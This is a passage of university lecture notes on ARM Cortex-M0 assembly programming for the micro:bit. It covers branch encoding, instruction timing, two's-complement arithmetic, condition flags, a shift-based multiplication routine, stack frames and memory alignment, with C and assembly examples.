When the branch is taken, the target address is the address of the instruction, plus 4, plus twice the offset: 0x4 + 4 + 2 * 2 = 0xc. Each conditional branch contains an 8-bit signed offset relative to pc+4 that is multiplied by 2. (The instruction is shown as beq.n because it is the narrow form of beq that fits in 16 bits; other ARM variants have a wide variant also, which the Cortex-M0 lacks.)

An unconditional branch has an 11-bit offset, so at 0xa we find 0xe7fa, or in binary,

11100 11111111010
b     offset -6

The target address is 0xa + 4 - 2 * 6 = 0x2.
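
The same arithmetic in C, as a sketch (the function names are invented):

#include <stdio.h>

/* Branch-target calculation: target = address + 4 + 2 * offset, with the
   offset sign-extended from 8 bits (beq) or 11 bits (b). */
unsigned beq_target(unsigned addr, unsigned instr) {
    int offset = (signed char) (instr & 0xff);   /* 8-bit signed offset */
    return addr + 4 + 2 * offset;
}

unsigned b_target(unsigned addr, unsigned instr) {
    int offset = instr & 0x7ff;                  /* 11-bit offset field */
    if (offset & 0x400) offset -= 0x800;         /* sign-extend */
    return addr + 4 + 2 * offset;
}

int main(void) {
    printf("%#x\n", beq_target(0x4, 0xd002));    /* prints 0xc */
    printf("%#x\n", b_target(0xa, 0xe7fa));      /* prints 0x2 */
    return 0;
}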

Glancing at the other instructions, the subs is encoded like this:

00111 001 00000001
subs  r1  const 1

You can see that, in this form of instruction that subtracts a constant from a register and puts the result back in the register, we have three bits to specify any register in the range r0--r7, and eight bits to specify a constant in the range [0..256).

The adds instruction is encoded in a form where three registers can be specified, so the result could have been put in a different place from the two inputs.

0001100 000 010 010
adds    r0  r2  r2

Only adds and subs exist in this form. As we shall see, other arithmetic and logical operations exist only in a form where the result register is the same as one of the inputs. This isn't because of any restrictions on what the core of the processor can do, but a matter of using the 16-bit instruction space in the most useful way.

Context

The Cortex-M0 (like other ARM variants), with the usual calling convention, makes special provision for a small subroutine like this that makes no access to (data) memory, receiving its arguments in registers, saving the return address in a register, and returning its result in a register. More complex subroutines do need to access memory, if they use more than a few registers, or if they call another subroutine, but simple 'leaf' routines are common enough that this gives useful savings. By way of contrast, the x86 has a calling convention where subroutine arguments and the return address are always stored on the stack, so that use of memory cannot be avoided.

Timing the program

[3.4] How fast (or how slow) is this routine? We can predict the timing easily on a simple machine like the Cortex-M0, because each instruction in the program takes one clock cycle to execute, except that a taken branch causes an additional two cycles to be lost before the machine executes the instruction at the branch target address. Thus the loop in the subroutine contains five instructions, but a typical iteration (any but the last) takes seven cycles: one for each instruction, including the untaken beq, and two extra cycles for the taken b instruction. And the number of iterations is equal to the argument b.

Connecting the logic analyser. The ground wire (white) is connected to the micro:bit's ground, and channel 1 (black) to Pin 3, which is high during the timing pulse. (I've used a breakout board to make the connections easier.)

Apart from branch instructions, which need 3 cycles if taken and 1 if not, instructions that access memory need an extra cycle, and provide another exception to the rule that the processor executes one instruction per clock cycle. The timings of all the instructions are given in Section 3.3 of the Cortex-M0 Technical Reference Manual linked from the documentation page. These timings reveal that a model of the processor where each successive state is computed in a combinational way from the preceding state is not really accurate. In fact, the Cortex-M0 design has a small amount of pipelining, overlapping the decoding of the next instruction and the fetching of the next-but-one with the execution of the current instruction.

The progress of instructions through the pipeline is disrupted whenever a branch is taken, and it takes a couple of cycles for the pipeline to fill again. Also, load and store instructions need to use the single, shared interface to memory both when the instruction is fetched and again when it is executed, so they also add an extra cycle. Unlike more sophisticated machines, the Cortex-M0 doesn't try to guess which way a branch instruction will go in order to avoid stalling the pipeline; for many such machines with deeper pipelines, the penalty for a mis-predicted branch is high, so effective branch prediction becomes essential for performance. More details on all of this can be found in the Second Year course on Computer Architecture.

[3.5] It's quite easy to verify the timing of the loop by experiment. Things are set up so that we can do this in three different ways.

  • First, the processor has an internal counter that increments at the same rate (16MHz) as the processor clock. As you've seen, the main program uses this counter to measure the number of clock cycles taken by the assembly-language subroutine func. After compensating for the time taken to perform the subroutine call, the time is printed together with the result.
  • Second, the main program lights one of the LEDs on the micro:bit during the time that the subroutine is running. We use electronic instruments to measure the time the LED is on. One possibility is to use an inexpensive logic analyser, but that is restricted to a sample rate of 24MHz, and that's barely enough to measure a pulse length that is a multiple of 1/16 μsec. But we can time a program that takes many clock cycles and still get a fairly accurate idea of the running time. For the multiplication program, we could try calculating 123 * 100 and 123 * 200, and the difference between the two times would be the time for 100 iterations of the loop.
  • Third, it's better to use an oscilloscope that is able to sample at a higher rate.

[3.6] Here's a trace for the calculation of 123 * 5 on the V1 micro:bit, showing a pulse length of 3.33μsec.

Calculation of 123 * 5

And here's a calculation of 123 * 6. The pulses can be measured with the oscilloscope even though they are far too short for the LED to light visibly.

Calculation of 123 * 6

The difference is 0.44μsec, as predicted: one extra iteration of the loop costs seven cycles, and 7/16 ≈ 0.44μsec at 16MHz.

We can do better than this! For one thing, we could code the function more tightly, and reduce the number of instructions executed and the number of cycles needed by the loop (see Ex. 1.3). But better still, we could use a better algorithm.

Questions

Will we need to memorise Thumb instructions for the exam?

No, the exam paper will contain a quick reference guide (published here in advance) to the commonly used instructions – and of course, you won't be expected to remember details of the uncommon ones. As you'll see, the ranges covered by immediate fields are spelled out, but there will be no questions that turn on the precise values. A question could refer to an instruction not on the chart, but only if the question itself describes the instruction.

For example, the paper might ask, "Explain why it is advantageous to allow a larger range of offsets for the load instruction ldr r0, [sp, #off] than for the form ldr r0, [r1, #off]." Or it might ask, "There is an instruction svc that directly causes an interrupt: explain why this instruction provides a better way of entering the operating system than an ordinary procedure call." There certainly won't be a question that says without further context, "Decode the instruction 0x8447." And in asking for a simple piece of assembly language, the paper won't try to trick you with snags like the fact that adds r0, r0, #10 has an encoding but adds r0, r1, #10 does not. If you write the latter instruction in place of movs r0, r1; adds r0, r0, #10 then you are unlikely to lose even a single mark.

If a subroutine expects its return address in the lr register, and one subroutine A calls another subroutine B, won't the call to B overwrite the return address of A, so that A no longer knows where to return?

Our first attempts at assembly language programming have been tiny subroutines that call no others and use only the registers r0 to r3. For them (leaf routines), we can assume the return address arrives in lr and remains there until the subroutine returns with bx lr. Calling another subroutine does indeed trash the value of lr, and that means that non-leaf routines must carefully save the lr value when they are entered, so that they can use it as a return address later. As we'll see very shortly, this is neatly done by writing something like

push {r4, r6, lr}

at the top of the subroutine, an instruction which at one fell swoop saves some registers and the lr value on the stack. Then we write a matching instruction

pop {r4, r6, pc}

at the bottom to restore the registers and load the return address into the pc, effectively returning from the subroutine. It's good that the action of saving registers on the stack is separate from the action of calling a subroutine, because it allows us to use the simpler and faster scheme for leaf routines.


Lecture 4 – Number representations

Signed and unsigned numbers. Numeric comparisons.


Signed and unsigned numbers

[4.1] So far we have used only positive numbers, corresponding to the C type unsigned. We can pin down the properties of this data type by defining a function \(\mathit{bin}(a)\) that maps an \(n\)-bit vector \(a\) to an integer:

\[\mathit{bin}(a) = a_0 + 2a_1 + 4a_2 + \ldots + 2^{n-1}a_{n-1} = \sum_{0\le i<n} a_i.2^i\]

(where \(n = 32\)). What is the binary operation \(\oplus\) that is implemented by the add instruction? It would be nice if always

\[\mathit{bin}(a \oplus b) = \mathit{bin}(a) + \mathit{bin}(b)\]

but unfortunately that's not possible owing to the limited range \(0 \le \mathit{bin}(a) < 2^n\). All we can promise is that

\[\mathit{bin}(a \oplus b) \equiv \mathit{bin}(a) + \mathit{bin}(b) \pmod{2^n}\]

and since each bit vector maps to a different integer modulo \(2^n\), this equation exactly specifies the result of \(\oplus\) in each case.
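
In C, arithmetic on unsigned values is defined to wrap modulo \(2^{32}\), so it implements \(\oplus\) exactly; a one-line demonstration:

#include <stdio.h>

int main(void) {
    unsigned a = 0xffffffff;   /* bin(a) = 2^32 - 1 */
    printf("%u\n", a + 1);     /* prints 0: 2^32 = 0 (mod 2^32) */
    return 0;
}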

[4.2] More commonly used than the unsigned type is the type int of signed integers. Here the interpretation of bit vectors is different: we define \(\mathit{twoc}(a)\) by

\[\mathit{twoc}(a) = \sum_{0\le i<n-1} a_i.2^i - a_{n-1}.2^{n-1}.\]

Taking \(n = 8\) for a moment:

    a        bin(a)   twoc(a)
-----------------------------
0000 0000       0        0
0000 0001       1        1
0000 0010       2        2
   ...
0111 1111     127      127 = 2^7 - 1
1000 0000     128     -128 = -2^7
1000 0001     129     -127
   ...
1111 1110     254       -2
1111 1111     255       -1

Note that the leading bit is 1 for negative numbers. So we see \(-2^{n-1}\le \mathit{twoc}(a) < 2^{n-1}\), and

\[\mathit{twoc}(a) = \sum_{0\le i<n} a_i.2^i - a_{n-1}.2^n = \mathit{bin}(a) - a_{n-1}.2^n.\]

So \(\mathit{twoc}(a) \equiv \mathit{bin}(a) \pmod{2^n}\). Therefore if \(\mathit{bin}(a \oplus b) \equiv \mathit{bin}(a) + \mathit{bin}(b) \pmod{2^n}\), then also \(\mathit{twoc}(a \oplus b) \equiv \mathit{twoc}(a) + \mathit{twoc}(b)\), and the same addition circuit can be used for both signed and unsigned arithmetic – a telling advantage for this two's complement representation.
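
We can watch this advantage in C, where the same addition of bit patterns gives the right answer under both interpretations:

#include <stdio.h>
#include <stdint.h>

/* One addition of 8-bit patterns, two readings of the result. */
int main(void) {
    uint8_t a = 0xfe, b = 0x03;             /* bin: 254 and 3; twoc: -2 and 3 */
    uint8_t s = a + b;                      /* the adder's output: 0x01 */
    printf("unsigned: %u\n", (unsigned) s); /* 1 = (254 + 3) mod 256 */
    printf("signed:   %d\n", (int8_t) s);   /* 1 = -2 + 3 */
    return 0;
}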

[4.3] How can we negate a signed integer? If we compute \(\bar a\) such that \(\bar a_i = 1 - a_i\), then we find

\[\begin{align}\mathit{twoc}(\bar a) &= \sum_{0\le i<n-1} (1-a_i).2^i - (1-a_{n-1}).2^{n-1}\\&= -\Bigl(\sum_{0\le i<n-1} a_i.2^i - a_{n-1}.2^{n-1}\Bigr) + \Bigl(\sum_{0\le i<n-1} 2^i - 2^{n-1}\Bigr) = -\mathit{twoc}(a)-1\end{align}\]

So to compute \(-a\), negate each bit, then add 1. This works for every number except \(-2^{n-1}\), which like 0 gets mapped to itself.
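
Here is that rule checked in C, with the computation done in unsigned arithmetic so that it is well defined even at the extremes:

#include <stdio.h>
#include <stdint.h>

int main(void) {
    uint32_t a = 42;
    printf("%d\n", (int32_t) (~a + 1));    /* flip the bits, add 1: prints -42 */
    uint32_t m = 0x80000000;               /* the bit pattern for -2^31 */
    printf("%#x\n", (unsigned) (~m + 1));  /* 0x80000000: its own negation */
    return 0;
}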

This gives us a way of implementing binary subtraction \(\ominus\) in such a way that

\[\mathit{twoc}(a\ominus b) \equiv \mathit{twoc}(a) - \mathit{twoc}(b) \pmod{2^n}.\]

We simply define \(a\ominus b = a\oplus \bar b\oplus 1\). If we have a method of addition that adds two digits and a carry in each column, producing a sum digit and a carry into the next column, then the natural thing to do is treat the \(+1\) as a carry input to the rightmost column. We will implement this electronically next term.

Context

This two's-complement binary representation of numbers is typical of every modern computer: the vital factor is that the same addition circuit can be used for both signed and unsigned numbers. Historical machines used different number representations: for example, in business computing most programs used to do a lot of input and output and only a bit of arithmetic, and there it was better to store numbers in decimal (or binary-coded decimal) and use special circuitry for decimal addition and subtraction, rather than go to the trouble of converting all the numbers to binary on input and back again to decimal on output, something that would require many slow multiplications and divisions. Floating point arithmetic has standardised on a sign-magnitude representation because two's-complement does not simplify things in a significant way. That makes negating a number as simple as flipping the sign bit, but it does mean that there are two representations of zero – +0 and −0 – and that can be a bit confusing.

Comparisons and condition codes

[4.4] To compare two signed numbers \(a\) and \(b\), we can compute \(a \ominus b\) and look at the result:

  • If \(a \ominus b = 0\), then \(a=b\).
  • If \(a \ominus b\) is negative (sign bit = 1), then it could be that \(a<b\), or maybe \(b<0<a\) and the subtraction overflowed. For example, if \(a = 100\) and \(b = -100\), then \(a-b = 200 \equiv -56 \pmod{256}\) in 8 bits, so \(a\ominus b\) appears negative when the true result is positive.
  • Similar examples show that, with \(a < 0 < b\), the result of \(a \ominus b\) can appear positive when the true result is negative. In each case, we can detect overflow by examining the signs of \(a\) and \(b\) and seeing if they are consistent with the sign of the result \(a \ominus b\).

[4.5] The cmp instruction computes \(a \ominus b\), throws away the result, and sets four condition flags:

  • N – the sign bit of the result
  • Z – whether the result is zero
  • C – the carry output of the subtraction
  • V – overflow as explained above

[4.6] A subsequent conditional branch can test these flags and branch if an appropriate condition is satisfied. A total of 14 branch tests are implemented.

equality     signed              unsigned                  miscellaneous
--------     ------              --------                  -------------
beq*  Z      blt  N!=V           blo = bcc*  !C            bmi*  N
bne*  !Z     ble  Z or N!=V      bls         Z or !C       bpl*  !N
             bgt  !Z and N=V     bhi         !Z and C      bvs*  V
             bge  N=V            bhs = bcs*  C             bvc*  !V

The conditions marked * test individual condition code bits, and the others test meaningful combinations of bits. For example, the instruction blt tests whether the comparison \(a<b\) was true, and that is so if either the subtraction did not overflow and the N bit is 1, or the subtraction did overflow and the N bit is 0 – in other words, if N ≠ V. All the other signed comparisons use combinations of the same ideas: it's pointless to memorise all the combinations.

For comparisons of unsigned numbers, it's useful to work out what happens to the carries when we do a subtraction. For example, in 8 bits we can perform the subtraction 32 − 9 like this, adding together 32, the bitwise complement of 9, and an extra 1:

32      0010 0000
~9      1111 0110
                1
      -----------
      1 0001 0111

The result should be \(23_{10} = 10111_2\), but as you can see, if performed in 9 bits there is a leading 1 bit that becomes the C flag. If we subtract unsigned numbers \(a-b\) in this way, the C flag is 1 exactly if \(a\ge b\), and this gives the basis for the unsigned conditional branches bhs (= Branch if Higher or Same), etc.

The cmp instruction has the sole purpose of setting the condition codes, and throws away the result of the subtraction. But the subs instruction, which saves the result of the subtraction in a register, also sets the condition codes: that's the meaning of the s suffix on the mnemonic. (The big ARMs have both subs that does set the condition codes, and sub that doesn't.) Other instructions also set the condition codes in a well-defined way. If the codes are set at all, Z always indicates if the result is zero, and N is always equal to the sign bit of the result.

  • In an adds instruction, the C flag is set to the carry-out from the addition, and the V flag indicates if there was an overflow, with a result whose sign is inconsistent with the signs of the operands.
  • In a shift instruction like lsrs, the C flag is set to the last bit shifted out. That means we can divide the number in r0 by 2 with the instruction lsrs r0, r0, #1 and test whether the original number was even with a subsequent bcc instruction. Shift instructions don't change the V flag.

Context

The four status bits NZCV are almost universal in modern processor designs. The exception is machines like the MIPS and DEC Alpha that have no status bits, but allow the result of a comparison to be computed into a register: on the MIPS, the instruction slt r2, r3, r4 sets r2 to 1 if r3 < r4 and to zero otherwise; this can be followed by a conditional branch that is taken if r2 is non-zero.

On x86, the four flags are called SZOC, with S for sign and O for overflow, and for historical reasons there are additional flags P (giving the parity of the least-significant byte of the result) and A (used to implement BCD arithmetic). Also, the sense of the carry flag after a subtract instruction is reversed, so that it is set if there is a borrow, rather than the opposite. Consequently, the conditions for unsigned comparisons are all reversed, so that the x86 equivalent of bhs is the jae (jump if above or equal) instruction, which branches if the C flag is zero. The principles are the same, but the detailed implementation is different.

Questions

Is overflow possible in unsigned subtraction, and how can we test for it?

Overflow happens when the mathematically correct result \(\mathit{bin}(a) - \mathit{bin}(b)\) is not representable as \(\mathit{bin}(c)\) for any bit-vector \(c\). If \(\mathit{bin}(a) \ge \mathit{bin}(b)\) then the difference \(\mathit{bin}(a) - \mathit{bin}(b)\) is non-negative and no bigger than \(\mathit{bin}(a)\), so it is representable. It's only when \(\mathit{bin}(a) < \mathit{bin}(b)\), so the difference is negative, that the mathematically correct result is not representable. We can detect this case by looking at the carry bit: C = 0 if and only if the correct result is negative.
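We can confirm the rule exhaustively in C, performing each subtraction as \(a + \bar b + 1\) in full int width so that bit 8 of the result plays the role of the C flag (a quick sketch for 8-bit operands):

#include <assert.h>

int main(void)
{
    for (unsigned a = 0; a < 256; a++)
        for (unsigned b = 0; b < 256; b++) {
            int carry = (a + (~b & 0xff) + 1) >> 8;     /* ninth bit of the sum */
            assert(carry == (a >= b));                  /* C = 0 exactly when a < b */
        }
    return 0;
}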

How can the overflow flag be computed?

Perhaps this is a question better answered next term, when we will focus on computing Boolean functions using logic gates. But let me answer it here anyway, focussing on an addition, because subtraction is the same as addition with a complemented input. The \(V\) flag should be set if the sign of the result is inconsistent with the signs of the two inputs to the addition. We can make a little truth table, denoting by \(a_{31}\) and \(b_{31}\) the sign bits of the two inputs, and by \(z_{31}\) the sign bit of the result.

a31   b31   z31    V
 0     0     0     0     All positive
 0     0     1     1     Positive overflows to negative
 0     1     ?     0     Overflow impossible
 1     0     ?     0     Overflow impossible
 1     1     0     1     Negative overflows to positive
 1     1     1     0     All negative

Various formulas can be proposed for \(V\): one possibility is \(V = (a_{31} \oplus z_{31}) \wedge (b_{31} \oplus z_{31})\), where \(\oplus\) denotes the exclusive-or operation.
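In C that formula takes only a couple of operations, working on whole words so that the operators act on the sign bits along with the rest (a sketch; unsigned arithmetic keeps the wrap-around well defined):

#include <stdint.h>

/* V flag for a 32-bit addition: 1 if the sign of the result is
   inconsistent with the signs of both operands */
int add_overflows(uint32_t a, uint32_t b)
{
    uint32_t z = a + b;                  /* wraps modulo 2^32 */
    return ((a ^ z) & (b ^ z)) >> 31;
}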

There is a neater way to compute \(V\) if we have access to the carry input \(c_{31}\) and output \(c_{32}\) of the last adder stage. We can extend the truth table above, filling in \(c_{32} = {\it maj}(a_{31}, b_{31}, c_{31})\) and \(z_{31} = a_{31}\oplus b_{31}\oplus c_{31}\) as functions of the inputs to the last stage.

a31   b31   c31   c32   z31    V
 0     0     0     0     0     0
 0     0     1     0     1     1
 0     1     0     0     1     0
 0     1     1     1     0     0
 1     0     0     0     1     0
 1     0     1     1     0     0
 1     1     0     1     0     1
 1     1     1     1     1     0

By inspecting each row, we can see that \(V = c_{31} \oplus c_{32}\). We can derive this using the remarkable equation

\({\it maj}(a,b,c)\oplus x = {\it maj}(a\oplus x, b\oplus x, c\oplus x)\),

and the property \({\it maj}(a, b, 0) = a \wedge b\). For, substituting for \(z_{31}\) in the previous formula for \(V\) and simplifying, we obtain

\(V = (b_{31}\oplus c_{31}) \wedge (a_{31}\oplus c_{31}) = {\it maj}(a_{31} \oplus c_{31}, b_{31}\oplus c_{31}, c_{31}\oplus c_{31}) = {\it maj}(a_{31}, b_{31}, c_{31})\oplus c_{31} = c_{32} \oplus c_{31}\).
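A tiny brute-force check of the derivation, enumerating the eight possible inputs to the last adder stage and comparing the two formulas for \(V\):

#include <assert.h>

static int maj(int a, int b, int c)
{
    return (a & b) | (b & c) | (a & c);
}

int main(void)
{
    for (int a = 0; a <= 1; a++)
        for (int b = 0; b <= 1; b++)
            for (int cin = 0; cin <= 1; cin++) {
                int cout = maj(a, b, cin);      /* carry out of the stage */
                int z = a ^ b ^ cin;            /* sum bit */
                int v = (a ^ z) & (b ^ z);      /* sign-inconsistency rule */
                assert(v == (cin ^ cout));
            }
    return 0;
}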



Lecture 5 – Loops and subroutines

A better multiplication algorithm. Stack frames. Recursive calculation of binomial coefficients.


A better multiplication algorithm

[5.1] Let's keep the invariant a * b = x * y + z, but try halving y in each iteration: in C,

unsigned func(unsigned a, unsigned b) {
    unsigned x = a, y = b, z = 0;

    /* Invariant: a * b = x * y + z */
    while (y != 0) {
        if (y % 2 != 0) z = z + x;
        x = x*2; y = y/2; 
    }

    return z;
}
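Before translating this to assembly language, we can convince ourselves the routine is correct with a quick test harness on the host (a sketch, assuming the function above is in scope):

#include <assert.h>

int main(void)
{
    for (unsigned a = 0; a < 200; a++)
        for (unsigned b = 0; b < 200; b++)
            assert(func(a, b) == a * b);
    return 0;
}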

We'll code this routine in assembly language, again keeping x, y and z in registers r0, r1 and r2. How are we going to implement the operations x = x*2 and y = y/2? The ARM provides shift instructions that (at least for positive inputs) can multiply or divide by powers of 2: the instruction

lsls r0, r0, #1

shifts the contents of r0 to the left by one place, multiplying the value by 2. (Actually, almost the same effect results from adds r0, r0, r0.) Also, the instruction

lsrs r1, r1, #1

shifts the contents of r1 one place to the right, dividing the value by 2, and throwing away any remainder. It shifts out a single bit at the right (and puts it in the C flag), and shifts in a zero at the left. These are called a logical shift because of the zero bit (or bits) that are shifted in at one end or the other; there's also an arithmetic right shift instruction that makes more sense when the bit pattern might represent a negative number.

The fact that the bit shifted out is put in the C flag allows us to implement the test y odd neatly: if we write

lsrs r1, r1, #1
bcc even

then that divides y by 2 and branches to the label even if y was even, executing the next instruction only if y was odd. (That's not an improvement we can expect a compiler to find.)

[5.2] A final idea is to put the test y != 0 at the end of the loop, so that there is only one branch instruction in the loop itself. The unconditional branch at the start is executed only once.

func:
        movs r2, #0             @ z = 0
        b test
again:
        lsrs r1, r1, #1         @ y = y/2
        bcc even                @ if y was even, skip
        adds r2, r2, r0         @ z = z + x
even:
        lsls r0, r0, #1         @ x = x*2
test:
        cmp r1, #0              @ if y != 0
        bne again               @   repeat
        movs r0, r2             @ return z
        bx lr

There's still something not-quite-optimal about this function, because if y is non-zero and is even, then we can be sure that y>>1 is still non-zero, and yet the program still tests for zero after every step: you can investigate this in the lab. Also, we could use loop unrolling, this time with a clear idea of how much unrolling is worthwhile.

Stack frames and locals

[5.3] What if ...

  • we want to write a subroutine that calls another, or perhaps recursively calls itself? (We must save our return address.)
  • we want to use registers r4--r7? (We must restore their values before returning.)
  • we want a subroutine that accepts more than four arguments? (They won't all fit in r0 to r3.)
  • we need more local variables than will fit in registers (or maybe a local array)?

The answer is to let the subroutine use space in memory, taken from the subroutine stack, giving it a stack frame. Most subroutines will be like this, except for tiny routines that call no others. The subroutine stack is an area of memory, starting from the highest addresses in RAM and growing downwards, that is reserved for storing information that relates to each subroutine activation. If one subroutine calls others, then all the others must return before the original subroutine returns, and it is this that makes the storage behave in a stack-like manner.

Stack frame layout

We'll leave until next time the possibility of having local variables that live in the stack frame, and the load and store instructions that must be used to access them. For now, let's concentrate on the possibility that we want to use the registers r4 to r7, in addition to the registers r0 to r3 that are already available to us. Conventions obeyed by all software on the micro:bit require us to restore these registers to their original values before the subroutine returns. Also, if this subroutine calls others, then the link register lr will be overwritten by the calls, and we will need to save its value somewhere if we are to know where to return.

The subroutine will have a layout like this:

func:
    push {r4, r5, lr}     @ Save registers

    @ Use r4 and r5, call other routines

    pop {r4, r5, pc}      @ Restore and return

The push and pop instructions transfer multiple words between registers and memory, and adjust the stack pointer. The push saves whatever registers (from r4 to r7) are used in the body of the subroutine, and also moves the return address from lr into the slot in the stack frame that is marked in the diagram. It also moves the stack pointer register sp down by the size of the items saved, ensuring that when this subroutine calls another one, the other subroutine will create its stack frame below ours without overlapping. When the micro:bit comes out of reset, the stack pointer is initialised so it points to the very top of the RAM area.

The body of the subroutine can overwrite the saved registers (r4 and r5 in this case) however it likes, and also call other subroutines using a bl instruction that overwrites the lr register. Whatever values we put in these registers will be preserved in their turn by the subroutines we call, so we can use them (unlike r0 to r3) to save values across subroutine calls. Other registers (r6 and r7 in this case) that we don't use need not be mentioned by us, even if they are used by other subroutines that we call. If those subroutines use them, then they will look after saving them (with the values that we received and have not changed) and restoring them to the same values before they return, so that they will have their original values when we ourselves return.

When execution reaches the pop instruction, its action is roughly inverse to the push instruction. Provided the register lists agree, the values saved in the stack frame on entry will be restored to the same registers, and then the return address will be moved – not back into lr where it arrived, but into the program counter pc, so that execution resumes with the instruction just after the one that called this subroutine.

The push and pop instructions represent a departure from the RISC principle that each instruction should describe a single, simple operation, but they are included to make programming easier and for performance. Although a push or pop instruction is equivalent to a sequence of load or store instructions plus an add or sub instruction that adjusts sp, in fact the instruction is more compact, and faster because it only needs to be decoded once, then (on the Cortex-M0) one register can be saved on each successive clock cycle. An ordinary load or store instruction takes 2 cycles, but a push or pop takes only n+1 cycles to save or restore n registers. Each instruction contains a little bitmap to say which of the low registers r0 to r7 to save or restore, plus an additional bit saying whether to save a return address from lr or restore it to pc. Although the assembly language syntax looks more general, in fact we aren't allowed to write things like

    pop {r4, lr}     @ Wrong!

because a pop can reload pc and never lr.

Example: factorials without a multiply instruction

Let's illustrate these ideas by writing a subroutine that computes the factorial of its argument, using a subroutine to do the required multiplications. This is a contrived and perhaps too simple example, but making it simple helps us to concentrate on the mechanisms. In C, our subroutine could be written like this:

int mult(int a, int b);     /* multiplication routine, defined elsewhere */

int fac(int n)
{
    int k = n, f = 1;

    while (k != 0) {
        f = mult(f, k);
        k = k-1;
    }

    return f;
}

There are two local variables, k and f. Because this subroutine calls others, we will keep both of them in registers that are preserved across subroutine calls: k in r4 and f in r5. Luckily, the argument n is not mentioned again after we have used it to initialise k, otherwise we would have to move it into another register also.

In assembly language, our subroutine can begin like this:

fac:
    push {r4, r5, lr}
    movs r4, r0             @ Initialise k to n
    movs r5, #1             @ Set f to 1

Then we are ready for the loop. For simplicity, let's keep the test at the top of the loop.

again:
    cmp r4, #0              @ Is k = 0?
    beq finish              @ If so, finished

Next comes the subroutine call f = mult(f, k): we must move the arguments, f and k into registers r0 and r1 respectively, then use bl to branch to the subroutine, and finally move the result from r0 back into r5 where f lives.

    movs r0, r5             @ Set f to f * k
    movs r1, r4
    bl mult
    movs r5, r0

The end of the loop body reduces k by one and branches back to the start.

    subs r4, r4, #1         @ Decrement k
    b again                 @ And repeat

When the loop is finished, we must move the result f into r0 before returning.

finish:
    movs r0, r5             @ Return f
    pop {r4, r5, pc}

In this program, as it happens, the subroutine mult uses only registers r0--r3, so it does not need to do anything to preserve the values that fac is keeping in r4 and r5. Those registers are saved on entry to fac, then the whole calculation happens using r4 and r5 to hold fac's variables, using r0--r3 temporarily to perform multiplications, and with no further transfers between registers and memory, until r4 and r5 are restored when fac returns.

Although the version of fac shown above is a faithful translation of the C original, it can be improved a bit if we observe that the variable f need not be preserved across the subroutine call, because the result of the call overwrites f. Because of this, there is no need to keep f in a register that is preserved across the call, and it can in fact live in r0 all the time, like this:

fac:
    push {r4, lr}
    movs r4, r0             @ Initialise k to n
    movs r0, #1             @ Set f to 1

again:
    cmp r4, #0              @ Is k = 0?
    beq finish              @ If so, finished

    movs r1, r4             @ Set f to f * k
    bl mult

    subs r4, r4, #1         @ Decrement k
    b again                 @ And repeat

finish:
    pop {r4, pc}

Optimising compilers are able to generate code like this by analysing the dataflow in the program, and assigning the same register to two quantities when one is a copy of the other. In this case, starting from the C code for fac, GCC is able to determine that the value returned by mult, the argument to the next invocation of mult, and the result that fac eventually returns can all live in r0. The code it outputs is similar to the second version of fac shown above.

Questions

What's the difference between a subroutine, a procedure and a function?

I tend to use all three terms interchangeably. I think subroutine is the most neutral term, unlikely to be confused with either an informal list of instructions (e.g., the procedure for downloading code to the micro:bit) or a mathematical operation (e.g., the sine function). The term procedure is common in thinking about Pascal-like languages, where indeed each subroutine is introduced by the keyword procedure. The corresponding term in C (and, I suppose, in functional languages) is function.

Couldn't we use a tst instruction to implement the test whether y is even?

In the lecture, I suggested using an ands instruction to mask out the bottom bit of y. After a bit of fumbling, we collectively came up with

    movs r3, #1
    ands r3, r3, r1
    beq even

It's also possible to exploit the tst instruction, which (according to the reference card) computes the bitwise and of its two inputs, uses it to set the N and Z flags, then throws the result away. It is related to the ands instruction in the same way that the cmp instruction is related to subs. Using this instruction, we can write

    movs r3, #1
    ...
    tst r1, r3
    beq even

That's the same number of instructions, but the difference is that the value in r3 is not overwritten, so we can set r3 to 1 just once outside the loop, and leave it there throughout the execution of the subroutine. Neither of these methods is quite as good as the solution we adopted, exploiting the fact that the lsrs instruction sets the C flag to the last bit shifted out.


Lecture 6 – Memory and addressing

Addressing modes. Arrays. Example: Catalan numbers.

The subroutines we have written so far have kept their data in registers, occasionally using the stack to save some registers on entry and restore them on exit. In more elaborate programs, we will want to access data in memory explicitly, for several reasons.

  • Sometimes there are too many local variables to fit in registers, and we will need to allocate space in the stack frame of a subroutine to store some of them.
  • High-level programs allow global variables, declared outside any subroutine, whose value persists even when the subroutines that access them have returned, and we want the same effect in an assembly-language program.
  • Programs that handle more than a fixed amount of data must use arrays allocated in memory to store it, either global arrays allocated once and for all, or arrays that are local to a subroutine.

For all these purposes, ARM processors use load and store instructions that move data between memory and registers, with the memory transfers happening in separate instructions from any arithmetic that is done on the loaded values before storing them back to memory. This contrasts with designs like the x86, where there are instructions that (for example) fetch a value from memory and add it to a register in one go; on the ARM, fetching the value and adding to the register would be two instructions. The most frequently used load and store instructions move 4-byte quantities between registers and memory, but there are also other instructions (we'll get to them later) that move single bytes and also two-byte quantities.

The entire memory of the computer (including both RAM and ROM) is treated as an array of individual bytes, each with its own address. Quantities that are larger than a single byte occupy several contiguous bytes, most commonly four bytes corresponding to a 32-bit register, with the "little-endian" convention that the least significant byte of a multibyte quantity is stored at the smallest address. These multibyte quantities must be aligned, so that (for example) the least significant byte of a four-byte quantity is stored at an address that is a multiple of four.
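A short C experiment makes the little-endian convention visible (a sketch; on the micro:bit the output would appear on the serial port):

#include <stdio.h>
#include <stdint.h>

int main(void)
{
    uint32_t x = 0x12345678;
    uint8_t *p = (uint8_t *) &x;

    /* On a little-endian machine this prints 78 56 34 12: the least
       significant byte sits at the lowest address. */
    for (int i = 0; i < 4; i++)
        printf("%02x ", p[i]);
    printf("\n");
    return 0;
}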

Context

Computers differ in the way they treat unaligned loads and stores, that is, load and store operations for multi-byte quantities where the address is not an exact multiple of the size of object. On some architectures, such as modern ARM chips, such loads and stores are not implemented and result in a trap, and in the case of the micro:bit with our software, in the Seven Stars of Death. On such machines alignment of loads and stores is mandatory. On other machines, like the x86 family, unaligned loads and stores have traditionally been allowed, and continue to be implemented in later members of the family, though as time goes on there may be an increasing performance gap between aligned and unaligned transfers. This happens because modern hardware becomes more and more optimised for the common case, and unaligned transfers may be supported by some method such as performing two separate loads and combining the results. So on these machines too, it makes sense to align objects in memory.

